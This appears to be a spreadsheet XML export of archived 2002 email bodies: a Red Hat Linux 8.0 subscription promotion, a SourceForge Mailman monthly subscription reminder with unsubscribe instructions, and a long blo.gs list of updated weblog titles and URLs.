  * Instant ISOs of any Red Hat Linux public release for the duration of
    your subscription.  * Priority access to updates and ISOs -- no busy signals, no searching
    mirror sites, no waiting.What's new in Red Hat Linux 8.0, anyway?  * A new interface -- a user-friendly desktop with graphical enhancements
    and improved menu organization.  * The latest Gnu Compiler Collection, gcc-3.2, and a specially tuned
    and tested high-performace kernel, 2.4.18.  * Cutting-edge web server technology powered by the latest release
    of Apache, 2.0.
  * Updated graphical configuration tools that make setting up a Linux
    server a truly point-and-click experience.
  * A single interface for package selection during and after installation
  * Enhanced personal security, featuring a point-and-click firewall
    tool to protect your system from Internet intruders.
How do I upgrade once I subscribe to Red Hat Network Basic service?
  * After purchase, you will be directed to the Instant ISO page.
    From there, follow the instructions for downloading and installing
    Red Hat Linux 8.0 from the ISO images.
Read more at: http://www.spamassassin.taint.org/software/linux/
DOWNLOAD 8.0 NOW.
Subscribe to Red Hat Network Basic and start downloading Red Hat Linux 8.0
instantly.
https://rhn.redhat.com/network/sales/purchase.pxt
</t>
  </si>
  <si>
    <t>******************************************************************************* 
This is an official mailing from SourceForge.net.  You are receiving
this message because you had previously subscribed to one of the more
than 20,000 opt-in mailing lists managed by SourceForge.net for the
projects hosted on SourceForge.net.  This message is a monthly
subscription reminder, automatically generated by the Mailman mailing
list management software used by SourceForge.net
(http://www.list.org).DO NOT REPLY to this email; instructions are provided here for
unsubscribing from a list, and for obtaining support.  Support is not
provided by email.To UNSUBSCRIBE:
 1. Use your web browser to access the list management URL for the
    list you wish to unsubscribe from (the list management URL for
each
    list may be found at the bottom of this email).
 2. If you do not already know your list management password, click on
the
    'Email My Password To Me' button.  List passwords will differ from
    list-to-list, and are different from the password you use on the
    SourceForge.net site, if you have an account there.
 3. From the list management page, enter your list password (see step
#2,
    above, if you do not know your list password) in to the
    'Unsubscribing from...' box, found in the upper right-hand corner
of
    the list management page.
 4. After entering the password for your subscription and clicking on
the
    'Unsubscribe' button, you will be unsubscribed from the list
immediately.
 5. To unsubscribe from more than one list, you must access the
management
    page for each, using the appropriate URL, listed at the bottom of
this
    email.To contact SUPPORT staff:
 1. All mailing lists hosted by SourceForge.net are opt-in via a
three-way
    handshake.  This is not a spam list; subscription to this list
    required you to respond to a confirmation email that was sent to
your
    email address.
 2. SourceForge.net provides hosting for more than 20,000 different
    mailing lists; if you contact our support staff, you must provide
    A) the email address associated with this monthly mailing AND
    B) the list of mailing lists from the bottom of this mailing
    Without this information, it will be difficult to assist you.
 3. Support is not provided by email.  All support inquiries related
to
    this mailing should be submitted as a Support Request at this URL:
    https://sourceforge.net/tracker/?func=add&amp;group_id=1&amp;atid=200001
    Proper issue reporting will help us to respond quickly.To change your subscription settings:
 1. Make use of the list management URL and password for the list
    in question; from the list management page, you may change your
    password or subscription preferences.
 2. If you do not already know your list management password, click on
the
    'Email My Password To Me' button.  List passwords will differ from
    list-to-list, and are different from the password you use on the
    SourceForge.net site, if you have an account there.If your email address is changing:
 1. Access the URL provided for list management at the bottom of this
email.
 2. Click on the name of the list, located at the bottom of the list
    management page (the link preceding the email address for the list
admin).
 3. Follow the instructions in the 'Subscribing to...' section to
subscribe
    your NEW email address to the list.
 4. Once subscribed, follow the instructions in the UNSUBSCRIBE
section
    (above) to unsubscribe the old address from the list in question.
 NOTE: There is no means to change the email address on your
subscriptions
 directly; use this procedure to change the subscriptions for each of
the
 lists you subscribe to.If you are a list ADMINISTRATOR and have lost your list admin
password:
 1. Follow the instructions in the SUPPORT section of this message
(above)
    to request a reset of your list admin password.  Please include a
list
    of the mailing lists whose passwords you need reset.  No automated
    facility is provided to reset list admin passwords.Please note: As of 2002-08-20, this mailing will no longer include the
list management passwords for your subscriptions.  If you have lost
your list management password, you will need to recover those
passwords on a per-list basis as described in #2 of the UNSUBSCRIBE
section, above.If you encounter a problem in accessing the mailing list management
page for a list, please contact the SourceForge.net team (see our
SUPPORT instructions, above) for assistance AFTER you try using a
different web browser for accessing that page.Thank you,the SourceForge.net team
(mailing list management URLs follow)
*******************************************************************************
This is a reminder, sent out once a month, about your
lists.sourceforge.net mailing list memberships.  It includes your
subscription info and how to use it to change it or unsubscribe from a
list.You can visit the URLs to change your membership status or
configuration, including unsubscribing, setting digest-style delivery
or disabling delivery altogether (e.g., for a vacation), and so on.In addition to the URL interfaces, you can also use email to make such
changes.  For more info, send a message to the '-request' address of
the list (for example, qpopper-webdev-request@lists.sourceforge.net)
containing just the word 'help' in the message body, and an email
message will be sent to you with instructions.If you have questions, problems, comments, etc, send them to
mailman-owner@lists.sourceforge.net.  Thanks!Subscriptions for shiva+qpopper-webdev@sewingwitch.com:List                                     // URL    
----                                     --------  
qpopper-webdev@lists.sourceforge.net    
https://lists.sourceforge.net/lists/options/qpopper-webdev/shiva%2Bqpopper-webdev%40sewingwitch.com</t>
  </si>
  <si>
    <t xml:space="preserve">change your settings: http://blo.gs/settings.phphere is your list of updated weblogs.Oct 04, 2002 3:03am
    love-always.net
      http://love-always.net/
    Michael's Cyber Journal
      http://weblog.michaelpark.net/
    Jesus Christ
      http://JesusChrist.nelson.org.nz/
    Roger Jones' Manila Weblog
      http://radio.weblogs.com/0110495/categories/rogerJonesManilaWeblog/
    Venezuela
      http://blogs.salon.com/0001330/categories/venezuela/
    The Devil's Excrement
      http://blogs.salon.com/0001330/
    Life begins at 40, change IS the constant
      http://pagandenman.blogspot.com/
    fast fiction
      http://fastfiction.blogspot.com/
    A Secular Perspective
      http://www.bunda.org/writings
    Neuroprosthesis News
      http://www.neuroprosthesis.org/blogger.html
    www.badassgeek.com
      http://www.badassgeek.com/index.xml
    Andy's Chest
      http://www.andyschest.com/
    MF&amp;A International
      http://www.marciafeldman.com/html/news.shtml
    Tkey's World
      http://blog.tkey.net/index.php
    Serenity Quest
      http://www.serenity-quest.com/pmachine/weblog.php
    joyfulchristian
      http://joyfulchristian.blogspot.com/
    clusterways
      http://www.melissahardie.com/cluster.htm
    Jason Wall's Photography and Blog
      http://www.wallzzz.com/
    maddy's rambles
      http://maddy.sovereignmagic.com/
    Open Tactics
      http://www.opentactics.com/blog.html
    Appetites
      http://appetites.blogspot.com/
    Tech Observer
      http://kennethhunt.com/
    Canada
      http://radio.weblogs.com/0111520/categories/canada/
    Lilac Senses
      http://masakasgift.com/Lilac.Senses
    Neolibertarian News Portal
      http://www.news-portal.com/
    Gay, Dead or Canadian
      http://www.gaydeadorcanadian.com/
    Alec Saunders .LOG
      http://radio.weblogs.com/0111520/
    Daily Shite
      http://www.hypothoseefilms.com/blogger.html
    Elvis Costello - The Trainspotters' News
      http://www.luckygoon.com/costello/news/
    A Lost Soul
      http://womansworth.net/lost/index.php
    Go to your room.
      http://www.consciousmother.com/
    diveintomark
      http://diveintomark.org/
    Text
      http://www.gulker.com/categories/text/
    Chris Gulker's Radio Weblog
      http://www.gulker.com/
    deadmoines.com
      http://www.jonlocker.100megsdns.com/dm/mt/deadmoines/
    Trommetter's Scrapblog
      http://www.trommetter.org/scrapbook/
    Michael Snider's Formal Radio Weblog
      http://radio.weblogs.com/0113501/
    The World Ate My Skull
      http://www.theworldatemyskull.com/
    AMCGLTD
      http://www.amcgltd.com/
    Heliopod - The Ultimate Guide to the Solaris(tm) Operating Environment
      http://heliopod.org/
    forest4trees
      http://webpages.marlboro.edu/~debock/weblog/index.html
    MyDD.com
      http://www.mydd.com/
    Flexistentialism
      http://www.flexistentialist.org/flex/
    Dayzed &amp; Confuzed
      http://www.astarradesigns.com/blog/
    Ken Dow &amp; the Tigers of Wrath
      http://blogs.salon.com/0001010/
    WomanChild
      http://www.womanchild.com/blog.html
    jerrybrito.com
      http://www.jerrybrito.com/blog
    Roger Jones
      http://rogjones.tripod.com/ 2:02am
    deeper in the void
      http://www.love-kills.net/ruffles/index.php
    Unleashing the Rage
      http://www.throughyoureyes.com/joey
    The Anti-Idiotarian Rottweiler
      http://www.nicedoggie.net/
    Painted-Turtle
      http://www.painted-turtle.com/
    Psychological Nudity
      http://www.listendontspeak.com/
    SCATTERED.ORG
      http://scattered.org/
    Luvlr.com
      http://luvlr.com/index.php
    Poets Corner
      http://poetscorner.com/submissions.php
    cymok.com
      http://www.cymok.com/slog/
    Dispersing.
      http://64.21.177.56/moe/
    There Is No Cat
      http://www.thereisnocat.com/
    lovelinks
      http://love-productions.com/lovelinks/mt/
    The Walk
      http://WWW.893studio.COM/thewalk
    Lovely Blog
      http://www.find-nirvana.net/kelley/blog/
    meh
      http://10sion.net/index.php
    Middle East Realities
      http://mideast-truth.blogspot.com/
    MacCritic.com Tips
      http://www.maccritic.com/tips/index.php
    saucyspot - WEBLOG
      http://www.saucyspot.com/weblog.php
    filchyboy
      http://blogs.salon.com/0001021/
    STANDING ROOM ONLY
      http://blogs.salon.com/0001573/
    Charles Nadeau's Radio Weblog
      http://radio.weblogs.com/0111823/
    Clube do Bolinha - Onde mulher ï¿½ assunto
      http://bolinhaclube.blogspot.com/
    eric.weblogs.com
      http://eric.weblogs.com/
    You Know It's True
      http://www.youknowitstrue.blogspot.com/
    AutomatedAlice.net
      http://automatedalice.net/weblog/
    Stealth Net Interactive
      http://www.stealth.net.nz/
    Electric Papyrus
      http://www.electricpapyrus.net/
    glosses.net : makeup your mind
      http://www.glosses.net/
    Confessions of a girl in love
      http://www.agirlinlove.org/confessions/
    Braves Journal
      http://bravesjournal.com/
    Broken Down
      http://broken.erratic.nu/
    Roger Jones' Radio Weblog
      http://radio.weblogs.com/0110495/
    blogdriverswaltz.com
      http://www.blogdriverswaltz.com/
    Arlecchino Malbenvolio
      http://www.arlecchino.org/bbs/blog.php?userid=1&amp;lastread=51
    Hacking For Humanity
      http://WWW.893studio.COM/HFH/
    Fed-Up.com
      http://www.fed-up.com/
    The Fat Guy
      http://www.thefatguy.com/
    Min Jung Kim - BrainDump v3
      http://www.minjungkim.com/
    One Golden Spoon
      http://www.onegoldenspoon.com/
    Hong
      http://weblogs.co.kr/hong/
    Sperari: I Have Hoped.
      http://www.sperari.com/
    Beans for Breakfast
      http://www.struat.com/here/
    Paul Boutin
      http://paulboutin.weblogger.com/
    dasheekeejones
      http://www.hooptymike.com/dasheekeejones/
    my.bits
      http://radio.weblogs.com/0100463/
    Shattered Buddha
      http://dragonleg.blogspot.com/
    KateSpot
      http://IamKate.blogspot.com/
    heffer.co.uk ï¿½ï¿½ï¿½ ZAP, BOP &amp; POW
      http://www.heffer.co.uk/
    Blogfodder
      http://www.blogfodder.net/
    kellycaldwell.com
      http://kellycaldwell.com/
    You Love That Shit!com
      http://www.youlovethatshit.com/
    Every Little Thing I Do Is Magic
      http://www.planxi-mihi.org/
    Cruft
      http://www.cruftbox.com/
    GiP: Ryan Coltrain
      http://www.giparty.org/people/ryancoltrain/
    Roger Jones' TechniBlog
      http://rogjones.weblogs.com/
    GiP: Tina Pettigrew
      http://www.giparty.org/people/tinapettigrew/
    MENTALSPACE
      http://mentalspace.ranters.net/
    Josh News
      http://www.joshsimmons.com/blogger.html
    The CampinGuys Radio Weblog
      http://radio.weblogs.com/0109487/
    E X T E N D E D . M I N D S
      http://www.extendedminds.net/blog.php
    BeaLog
      http://www.beatrizdominguez.com/blog
    Libran Ramblings
      http://libra.dragoness.net/index.php
    slighty employed coder
      http://matt.binaryslaves.com/
    Collaxa's Take
      http://www.collaxa.com/news.blog.html
    The Jackson Simon Review
      http://jacksonsimon.blogspot.com/
    alexanderwayne
      http://alexanderwayne.com/weblog/
    Connectivity: Spike Hall's RU Weblog
      http://radio.weblogs.com/0106698/
    Frankenstein
      http://asterius.com/pf
    DiaWebLog
      http://www.diaweblog.org/
    furnari.net
      http://www.furnari.net/
    Zach is Jonah
      http://zachisjonah.blogspot.com/
    [democraticvistas:/] dave%
      http://www.democraticvistas.com/
    destinationtheories
      http://destination-theory.net/
    Jennifer L.G. Wallace's Radio Weblog
      http://radio.weblogs.com/0114198/
    OverExposure
      http://funk.shacknet.nu/blog/
    itymbi
      http://www.zanthan.com/itymbi/
    The Hauser Report - Picking Fights
      http://www.hauserreport.com/pickingfights/index.html
    Random Variables :: random thoughts deep and wide
      http://random.antville.org/
    Lexi - The Dog
      http://lexi.hillabolt.com/
    I Will Dare
      http://www.iwilldare.com/
    Bruner Blog
      http://www.bruner.net/blog/index.html
    Baseball
      http://www.thefatguy.com/categories/baseball/
    serialdeviant.org(y)
      http://serialdeviant.org/
    snowdeal.org &gt; informatics
      http://snowdeal.org/section/informatics/
    a digitized existence
      http://log.impolite.org/
    Anwnn
      http://www.bansheestudios.net/blog/
    divagaï¿½ï¿½es de um poetero
      http://poetero.blogspot.com/
    They Won't Buy the Cow
      http://BuyTheCow.blogspot.com/
    shutitdown.net
      http://www.shutitdown.net/
    this is the life of an albino giraffe
      http://fubsy.net/blog
    theGNUeconomy
      http://www.gnueconomy.net/
    not a pretty girl
      http://www.eilatan.net/adventures
    Snappish Thoughts
      http://www.snappishproductions.com/blog/
    Boblet
      http://radio.weblogs.com/0113872/
    (In)formaï¿½ï¿½o &amp; (In)utilidade
      http://www.interney.net/
    Terradyme: Trials and Tribulations
      http://www.terradyme.com/
    crispytomato
      http://crispytomato.net/index.php
    dream to reality&gt;&gt;V5.0 Spy
      http://dream-to-reality.org/
    CubeOwner.com
      http://www.cubeowner.com/index.html
    Slashdot
      http://slashdot.org/
    HOLYDEVILISATION
      http://holydevilisation.blogspot.com/
    drbeeper
      http://drbeeper.ManilaSites.Com/
    Balloon Juice- Hot air and ill-informed banter
      http://grump.blogspot.com/
    The Dancing Sausage Side Dish
      http://gus.protest.net/
    dws.salon
      http://blogs.salon.com/0001007/
    Catfish On The Table
      http://www.my-blog.com/
    Dog News: weird, inspiring dog tales
      http://radio.weblogs.com/0107233/
    Nicest of the Damned
      http://fsteele.dyndns.org/
    Matthew Yglesias
      http://www.matthewyglesias.com/
    Tareas II
      http://home.earthlink.net/~cpalma/spanish/categories/myHobbies/
    Rantburg
      http://www.rantburg.com/
    Jack in Oklahoma
      http://jackinwestok.blogspot.com/
    Net-Hub Chatter
      http://www.net-hub.com/updates
    bootrecords
      http://bootrecords.com/
    bootrecords
      http://bootrecords.com/index.php
    Raising Hell
      http://rhzine.com/
    Tareas I
      http://home.earthlink.net/~cpalma/spanish/categories/myFriends/
    Toby's Political Diary - 'Let it Begin Here'
      http://blogs.salon.com/0001282/
    [working code]
      http://www.working-code.com/
    matt.griffith
      http://matt.griffith.com/weblog/
    a joshua tree in every pot
      http://www.chrisbarrus.com/weblog/
    Irate Weirdos
      http://www.irateweirdos.com/
    broomeman.com
      http://www.broomeman.com/
    spastic yak
      http://www.spasticyak.com/
    SFSU Conservative
      http://SFSTATE.blogspot.com/
    24-hour drive-thru
      http://www.drive-thru.org/
    DrunkAndRetired.com
      http://www.drunkandretired.com/
    A+1 (::::| BAND-AID |::::) in ur dark-version
      http://blogdode.blogspot.com/
    Raleighnet.org
      http://raleighnet.org/Speak
    The Thinker
      http://www.levistable.com/thethinkersblog/
    ramblingsofagirl
      http://ramblingsofagirl.oasismag.com/
    forty.something
      http://www.fortysomething.ca/
    Twenty Something Blog
      http://20-Something.blogspot.com/
    the Limey Brit
      http://www.thelimeybrit.com/
    Frank Patrick's Focused Performance Blog
      http://www.focusedperformance.com/blogger.html
    God's in his heaven, all's right with the world
      http://jehova.omnipotente.com/
    x-pollen
      http://blogs.salon.com/0001111/categories/xPollen/
    Blogueiros
      http://blogueiros.blogspot.com/
    Net-Hub Linux
      http://www.net-hub.com/linux
    JURIST
      http://jurist.law.pitt.edu/index.htm
    dcthornton.blog
      http://blog.dcthornton.com/
    tins ::: Rick Klau's weblog
      http://www.rklau.com/tins/
    Doozy
      http://doozy.us/blog/
    The Second Page
      http://www.likeablindman.com/secondpages
    More Than Zero
      http://www.morethanzerosum.com/
    I bent my Wookie.
      http://home.earthlink.net/~jkchong/blog/blogger.html
    lrig fo golb a - ssendam latot
      http://echo.love-always.net/index.php
    greeblie blog
      http://www.greeblie.com/
    Colin McPherson's Radio Weblog
      http://radio.weblogs.com/0111663/
    Hiding Among the Masses
      http://www.ee.cooper.edu/~nuval/blog/
    Social Psychology
      http://radio.weblogs.com/0101747/categories/socialPsychology/
    Huzzah
      http://huzzah.hoffmang.com/
    Ingo Rammer's DotNetCentric
      http://www.dotnetremoting.cc/DotNetCentric/
    p r o t o t y p e 2 6
      http://www.prototype26.com/self/journal/
    Michael's Radio Weblog
      http://radio.weblogs.com/0113814/
    Kats Whispers
      http://katswhispers.onestarrynight.com/
    Gnosis
      http://blogs.salon.com/0001081/
    landonline
      http://radio.weblogs.com/0101747/categories/landonline/
    StillPixels
      http://www.stillpixels.org/
    Synthesis and Output
      http://www.projectjanel.org/weblog/
    Bruce Landon's Weblog for Students
      http://radio.weblogs.com/0101747/
    HelpKnot
      http://helpknot.blogspot.com/
    Subject to Change
      http://www.mussington.com/
    summer blues
      http://www.fivefootfour.com/type/
    The Future Dr. Karlsbjerg
      http://www.karlsbjerg.net/blog/
    a blog with a name that keeps changing
      http://fieldmethods.net/blog/
    Country Store
      http://countrystore.blogspot.com/
    Bits, Bytes, and Blog
      http://www.brad.murphy.name/
    Luvs.org :: Rantings
      http://www.luvs.org/
    Luvs.org :: Rantings
      http://www.luvs.org/f/main.php
    anonym
      http://anonym.antville.org/
    Propellerhead In Performance
      http://radio.weblogs.com/0111473/categories/propellerheadInPerformance/
    Desultory Thoughts of a Notorious Propellerhead
      http://radio.weblogs.com/0111473/
    candygenius
      http://www.candygenius.com/
    Sarah Coleman's Art
      http://www.sarahcoleman.com/art.php
    out of focus
      http://www.thevisualrecord.com/oddthought/oddthoughtblog.html
    Digitized Doodles
      http://blogs.salon.com/0001584/
    Bit Banger
      http://trmk.org/~adam/blog
    element
      http://home.earthlink.net/~tokkata9/blog.htm
    Escapable Logic
      http://www.blaserco.com/blogs/
    Guerrilla Movements -- Communiquï¿½
      http://www.guerrillamovements.com/front.shtml
    Pesky the Rat
      http://blogs.salon.com/0001293/
    dfc
      http://anize.org/think/dfc/
    justinrussell.com
      http://www.justinrussell.com/
    The Prayer Book Society: News
      http://www.episcopalian.org/pbs1928/PBNews.htm
    Thumper's Thoughts
      http://kathompson.blogspot.com/
    Dexter/Lari
      http://disturbiosperturbados.blogspot.com/
    Red Headed Blogger
      http://www.10500bc.org/camille/
    Mixed Grill
      http://www.spotthelooney.net/weblog/
    Experiment 2 - Day
      http://wjs2.blogspot.com/
    nzpundit.com
      http://202.36.170.13/mt/
    Love and Writing Project
      http://www.scriptocentris.org/
    The LitiGator
      http://radio.weblogs.com/0110436/ 1:01am
    zannie.com - brucie's mommy
      http://www.zannie.com/
    ketchupp :: [it's a pun, idiot]
      http://ketchupp.faerie-tale.net/main/blog.php
    Think Hub
      http://radio.weblogs.com/0106906/
    My Single Mom Life
      http://mysinglemomlife.rain-cloud.com/
    Christina's Blog
      http://www.liquidvolt.com/christina
    not operating heavy machinery - h t m l f o o d . c o m
      http://80.71.2.98/~htmlfood/index.php
    Demented and Sad, but Social
      http://www.dementedandsad.com/
    Ariel's Blog
      http://www.arielpayit4ward.com/
    8bit Gamepad
      http://www.8bitjoystick.com/gamepad/
    gomi no sensei
      http://gominosensei.org/
    Xiffy's weblog
      http://xiffy.nl/weblog/
    Chuckler's Musings
      http://www.chuckler.org/
    The Table of malContents Weblog
      http://www.westfieldnetwork.com/malcontents/
    life change
      http://www.zannie.com/life
    t o k e n r a m b l i n g s... [v.2]
      http://www.tokenramblings.com/
    Joe Hallett's Radio Weblog
      http://radio.weblogs.com/0102614/
    Envy-Us.com
      http://www.envy-us.com/blog
    Brazil
      http://radio.weblogs.com/0101101/categories/brazil/
    B r o k e n D r e a m s
      http://feralheart.com/journal/
    KEC Journal
      http://www.hatano-es.com/kiyo/journal/
    The Angel/Devil Conundrum
      http://www.conreyguy.com/blog/
    Painted-Secrets Blog
      http://www.painted-secrets.net/
    road
      http://blogs.salon.com/0001007/categories/road/
    My Profession
      http://radio.weblogs.com/0111473/categories/myProfession/
    Ramblings of a Code Monkey
      http://www.milbertus.com/
    ï¿½milius' blog spot
      http://aemilius.blogspot.com/
    Chi Alpha @ Stanford
      http://xastanford.org/
    AlterNet: War on Iraq
      http://www.alternet.org/waroniraq
    Rants
      http://www.almost-good.net/index.php
    SHITHAPPENS
      http://sh1.antville.org/
    Frank Gumola | Where My Hoecakes At?
      http://frankie.odnc.net/weblog.html
    Sandy's Place
      http://sandy.sovereignmagic.com/
    Amanita.net
      http://journal.amanita.net/
    Fiction Cartel's Sedentary Lifestyle
      http://www.fictioncartel.com/weblog/
    coolwalkingsmoothtalking
      http://www.lomara.org/mtblog
    AltRaptors
      http://www.altraptors.com/
    Aged and Confused
      http://yvonnemarie.blogspot.com/
    Opportunities In Work Clothes
      http://radio.weblogs.com/0114086/
    negroplease.com :: better left unsaid
      http://www.negroplease.com/
    Triplicate 1.0
      http://www.littlebastard.net/triplicate
    bad samaritan (blue)
      http://www.badsamaritan.com/
    The Road to Surfdom
      http://theroadtosurfdom.blogspot.com/
    Corndog Weblog
      http://similarselection.org/corndog/
    Trip/T'Polers: A Trip and T'Pol Shipper's Site
      http://triptpolers.houseoftucker.com/
    the me pages
      http://www.etches-johnson.com/me/pages.html
    Monsters From The Id
      http://www.monstersfromtheid.com/
    daily fragments
      http://rina.h-y-p-h-e-n-s.net/blog/index.php
    EdCone.com
      http://radio.weblogs.com/0107946/
    mary's little life.
      http://maryann.blogspot.com/
    Fazal Majid's weblog
      http://www.majid.info/radio/
    sparkLingreentea
      http://sparklingreentea.antville.org/
    learnignorance: college happenings
      http://www.learnignorance.com/
    adampsyche
      http://www.adampsyche.com/
    Buzz-A-Roni
      http://pencilboxartco.blogspot.com/
    Coral Reefs in the News
      http://news.coralreefalliance.org/
    Paul Howson's Radio Weblog
      http://radio.weblogs.com/0101175/
    agendacide.com/glenda
      http://www.agendacide.com/glenda/
    played
      http://www.morethanokay.com/
    System.Error.Emit
      http://radio.weblogs.com/0108189/
    &gt;
      http://www.tbonez.com/kiss/index.php
    Bandwidth
      http://www.rodentregatta.com/categories/bandwidth/
    Our Geocaching Adventures
      http://www.lecour.net/geocaching/
    Uffish Thoughts
      http://www.uffish.com/
    Frozen Emotions
      http://www.intensified.org/frozenemotions
    Frozen Emotions
      http://www.intensified.org/frozenemotions/index.php
    topic.Hollywood
      http://coolstop.com/radio/categories/topicHollywood/
    mr. trinity
      http://mrtrinity.eastwest.nu/
    The Sakamuyo Log
      http://sakamuyo.net/log/
    Leading IT
      http://www.rodentregatta.com/categories/leadingIt/
    shilohbucher.com
      http://www.shilohbucher.com/blog
    telescï¿½pica 2.0
      http://www.boechat.com/tele/
    The Yarn.net
      http://www.the-yarn.net/index.php
    I Stab People
      http://vaspider.surreally.net/psyjack/
    Bozzy's World
      http://www.bozzysworld.com/
    Buoyantville... where words float!
      http://buoy.antville.org/
    Jennifer Kyrnin's Markup Languages Weblog
      http://www.kyrnin.com/blog/
    Weblog
      http://www.saltwatersound.com/
    Playing with my food, and other things
      http://blogs.salon.com/0001444/
    905life
      http://nelson.littlebastard.net/905life
    The Quidnunc
      http://quidnunc.tznet.com/
    sahm i am
      http://www.thehackworths.com/
    Rachel's School Days
      http://www.trommetter.org/rachel/
    From the Heart
      http://surreally.org/diana/
    Design
      http://www.rodentregatta.com/categories/design/
    Rodent Regatta
      http://www.rodentregatta.com/
    gRadio
      http://radio.weblogs.com/0001215/
    on my mind
      http://ciscley.frohme.org/
    Executive Edition
      http://radio.weblogs.com/0108660/categories/executive/
    Deviled Chicken
      http://cleopatra2.home.mindspring.com/
    logan_x
      http://www.zer01.net/
    Antville-Treffen, whats next?
      http://relev.antville.org/
    my weblog
      http://sweetstar.net/blog/index.php
    How did they ever make a blog of Zoe?
      http://www.latertater.com/zoe
    Becoming
      http://www.irelan.net/becoming/
    ALT1040
      http://alt1040.com/
    Foment
      http://foment.net/
    News
      http://radio.weblogs.com/0113147/categories/news/
    THE MANTRA PRESS
      http://radio.weblogs.com/0113147/
    Bumptious
      http://bumptiously.blogspot.com/
    World Affairs from Wozz
      http://blogs.salon.com/0001019/categories/worldAffairsFromWozz/
    Clinical studies
      http://radio.weblogs.com/0108660/categories/clinicalStudies/
    PULSE
      http://radio.weblogs.com/0108660/
    Kevin's Blog
      http://www.kevinsblog.com/
    exit 670 dot com
      http://www.exit670.com/
    charging the canvas
      http://www.osse.com/perfectly_delightful/slog.html
    Stuff from Wozz
      http://blogs.salon.com/0001019/
    Medianetwork
      http://www.myjamby.com/medianetwork/
    Tips, Tricks and Things to Do
      http://www.thegirliematters.com/tips/
    martinlittle.com:thinkThin
      http://martinlittle.com/
    sweetconfetti.net
      http://www.sweetconfetti.net/
    Space Waitress Gate A
      http://www.gospacewaitress.com/
    Recreational Chemistry
      http://www.flipsyde.gigasprite.com/
    It Is Just Me?
      http://blogs.salon.com/0001571/
    Chris Adams
      http://improbable.org/chris/index.php
    Department of Theology at University of Blogistan
      http://theologydept.blogspot.com/
    Journal
      http://jaycub.com/index.php
    HOLY CRAP!
      http://theminister.net/
    Refuge (sur MonBlogue.com)
      http://Cabotine.monblogue.com/
    Webfroot
      http://www.webfroot.co.nz/
    SOAPnXMLRPC
      http://www.rolandTanglao.com/categories/soapnxmlrpc/
    William T Goodall's Weblog
      http://radio.weblogs.com/0111221/
    :e m p t y a g e:
      http://www.honan.net/
    tripledoubleyou.com
      http://www.tripledoubleyou.com/
    Blogrolling
      http://www.rolandTanglao.com/categories/blogrolling/
    HowToDevelopSoftware
      http://www.rolandTanglao.com/categories/howtodevelopsoftware/
    KLogs
      http://www.rolandTanglao.com/categories/klogs/
    Kuja's Psychedelic Breakfest
      http://radio.weblogs.com/0103886/
    BBARTEE Art Blog
      http://www.bbartee.com/blog.shtml
    Kuja's Electronic Samizdat
      http://samizdat.manilasites.com/
    i8pop
      http://www.somalounge.net/i8pop/
    Ginadapooh's Blog
      http://www.nivlac.com/blog
    outinfive
      http://outinfive.com/
    Career Help
      http://www.rodentregatta.com/categories/careerHelp/
    freedexter dot com
      http://www.freedexter.com/
    Managed Care Daily Briefing
      http://www.managedcaremag.com/rdaily/
    josh lucas' Radio Weblog
      http://radio.weblogs.com/0111200/
    Linkmeister
      http://linkmeister.com/blog
    dragon
      http://dragon.oasismag.com/
    Bells and Whistles
      http://www.kittyjoyce.com/azender/log/
    Hoopty Loops
      http://www.hooptymike.com/loops
    reesesMusing
      http://www.astrogoth.com/~reeses/musing
    web.log
      http://delia2d.com/blog
    Idiot Wind
      http://mamafanfan.blogspot.com/
    Good-Enough
      http://www.good-enough.net/
    600 seconds
      http://600seconds.blogspot.com/
    spidermoon blog ... futurepast
      http://www.blogstudio.com/spidermoon/index.html
    asterisk*
      http://www.7nights.com/asterisk/
    House 8 Weblog
      http://www.house8.net/weblog/
    pinkstar stuff
      http://www.pinkstar.org/
    TummyMonsters
      http://www.tummymonsters.com/
    MyFreePress.com
      http://radio.weblogs.com/0106101/
    o cc do caiocesar na www
      http://www.caiocesar.cc/index.php
    BLAH BLOG
      http://www.oceansky.org/blah/index.php
    Volvo Mom
      http://volvomom.com/
    InkBlog
      http://www.inkgrrl.com/inkblog.htm
    Notes From Atlanta
      http://blogs.salon.com/0001490/
    Empty-handed
      http://www.empty-handed.com/
    Notes to Self
      http://www.mellenheads.net/weblog/stacey
    glitch.nu
      http://glitch.nu/
    Culture and Politics
      http://www.flightpath.com/categories/politics/
    Recycled Thoughts
      http://recycled-thoughts.com/
    h a na
      http://www.keekiland.com/val/
    uncle john's blog
      http://thedeadbeat.com/ujb/index.html
    Not Content To Crawl
      http://nicole.sleepyfroggie.net/journal/
    Canada News
      http://radio.weblogs.com/0108660/categories/canadaNews/
    The House of Hackers Blog
      http://www.houseofhackers.com/blog/
    Rafa_Jim Blog
      http://rafajim.blogspot.com/
    Tarpey News
      http://tarpey.blogspot.com/
    A blog doesn't need a clever name
      http://blogs.salon.com/0001004/
    The Hairy Eyeball Jotbook News
      http://hairyeyeball.net/jotbook/
    Pushing rectangles
      http://radio.weblogs.com/0105501/
    Sherwood Forest
      http://www.fsherwood.com/blog/
    GeekyChick.net
      http://www.geekychick.net/blog/
    An allrite Life
      http://www.allrite.net/allrite/
    US News
      http://radio.weblogs.com/0108660/categories/usNews/
    The Hairy Eyeball Jotbook News
      http://hairyeyeball.net/jotbook
    greg.org: about making films
      http://greg.org/
    Notes from Classy's Kitchen
      http://www.classy.dk/
    Birds Etcetera (aka Bird Stuff)
      http://BirdStuff.blogspot.com/
    7 Anti-Social Days With Kevin Breit
      http://kbreit.dyndns.org:8080/
    P@'s Radio Weblog
      http://radio.weblogs.com/0105673/
    j.kinyeta; nameste
      http://www.kinyeta.com/blog
    Eclecticity: Dan Shafer's Web Log
      http://radio.weblogs.com/0001285/
    napoleondynamite.com
      http://www.napoleondynamite.com/radio/
    Useless! Worthless! Insipid!
      http://www.epenthesis.org/
    evilboy.org blog
      http://evilboy.org/
    Handheld Instructional Technology
      http://education.atu.edu/people/sadams/blogger2/
    Managed care
      http://radio.weblogs.com/0108660/categories/managedCare/
    Le blogue de BRANCHEZ-VOUS! (sur MonBlogue.com)
      http://blogue.monblogue.com/
    Binary by Accident
      http://radio.weblogs.com/0100111/
    Lot 49
      http://www.lot49.com/
    Friends
      http://www.changnet.com/categories/friends/
    Spicy Melon
      http://www.jakwon.com/
    halfass.com
      http://www.halfass.com/log
    It's Big, It's Heavy, It's Blog!
      http://www.largeamericanpenis.com/
    inkyblack:dot:net
      http://www.inkyblack.net/
    The Chang Journal
      http://www.changnet.com/
    Depois Eu Penso Nisso
      http://bolsademulher.blogspot.com/
    Idiot Quotient
      http://idiotquotient.blogspot.com/
    Boring Porn
      http://www.boringporn.com/
    SubAverage
      http://subaverage.com/
    Barefoot
      http://www.bare-foot.co.nz/
